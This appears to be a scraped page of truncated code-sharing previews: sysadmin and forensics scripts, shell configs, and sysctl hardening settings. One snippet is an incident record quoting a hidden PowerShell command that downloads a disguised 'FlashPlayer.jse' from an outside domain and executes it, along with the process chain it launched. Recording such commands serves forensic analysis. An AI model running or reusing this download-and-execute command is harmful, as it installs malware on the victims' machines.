./autorunsc -a * -c -h -m -s -t -nobanner * >> autorunsc.txt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
PROMPT='%{$fg_bold[white]%}%M %{$fg_bold[red]%}✈ % | |
{$fg_bold[green]%}%p %{$fg[cyan]%}%c % | |
{$fg_bold[blue]%}$(git_prompt_info)%{$fg_bold[blue]%} % % | |
{$reset_color%}' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# | |
# WmiExplorer.ps1 | |
# | |
# A GUI WMI explorer and WMI Method Help generator | |
# | |
# /\/\o\/\/ 2006 | |
# www.ThePowerShellGuy.com | |
# | |
# load Forms NameSpace | |
[void][System.Reflection.Assembly]::LoadWithPartialName("System.windows.forms") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env bash | |
# Install SIFT Workstation Tools - tested to work on Ubuntu 16.04 | |
# j3rmbadger | |
# Snag the binaries - https://github.com/sans-dfir/sift-cli | |
wget https://github.com/sans-dfir/sift-cli/releases/download/v1.5.1/sift-cli-linux | |
wget https://github.com/sans-dfir/sift-cli/releases/download/v1.5.1/sift-cli-linux.sha256.asc1 | |
# Validate signature file | |
gpg --keyserver pgp.mit.edu --recv-keys 22598A94 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# tmux requires unrecognized OSC sequences to be wrapped with DCS tmux; | |
# <sequence> ST, and for all ESCs in <sequence> to be replaced with ESC ESC. It | |
# only accepts ESC backslash for ST. | |
# | |
# Don't forget to chmod +x to imgcat.sh (makes script executable) | |
function print_osc() { | |
if [[ $TERM == screen* ]] ; then |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
# | |
# Author: Marin Atanasov Nikolov <dnaeon@gmail.com> | |
# http://dnaeon.github.io/enable-ksm-during-boot-time-on-linux/ | |
# | |
### BEGIN INIT INFO | |
# Provides: ksm | |
# Required-Start: | |
# Required-Stop: | |
# X-Start-Before: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python2 | |
import base64, struct, sys | |
if len(sys.argv) > 1: | |
try: | |
binary = base64.decodestring(sys.argv[1]) | |
#File header | |
sys.stdout.write(struct.pack("IHHIIII", | |
0xa1b2c3d4, # Magic |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
1. | |
`"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+[char][byte]92+'1515369180924.js';(New-Object System.Net.WebClient).DownloadFile('http'+'s://choh5franchising.org/255284510275/1515369170878859/FlashPlayer.jse',$d);Invoke-Item $d;` | |
2. | |
`Parent Command Line "C:\Windows\System32\WScript.exe" "C:\Users\SVCSTO~1\AppData\Local\Temp\1515369180924.js"` | |
`Process Command Line: | |
"C:\Windows\System32\cmd.exe" /v /k "@echo off & color 0A &SET PRG0=[____________________] 0&SET PRG1=[##__________________] 10&SET PRG2=[####________________] 20&SET PRG3=[######______________] 30&SET PRG4=[########____________] 40&SET PRG5=[##########__________] 50&SET PRG6=[############________] 60&SET PRG7=[##############______] 70&SET PRG8=[################____] 80&SET PRG9=[##################__] 90&SET PRG10=[####################] 100&echo Please Wait...&ping -n 2 localhost >nul&(FOR /L %I IN (0,1,10) DO (cls&echo Please Wait...&echo --------------------------------------&echo Progress: !PR |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Enable syn flood protection | |
net.ipv4.tcp_syncookies = 1 | |
# Ignore source-routed packets | |
net.ipv4.conf.all.accept_source_route = 0 | |
# Ignore source-routed packets | |
net.ipv4.conf.default.accept_source_route = 0 | |
# Ignore ICMP redirects |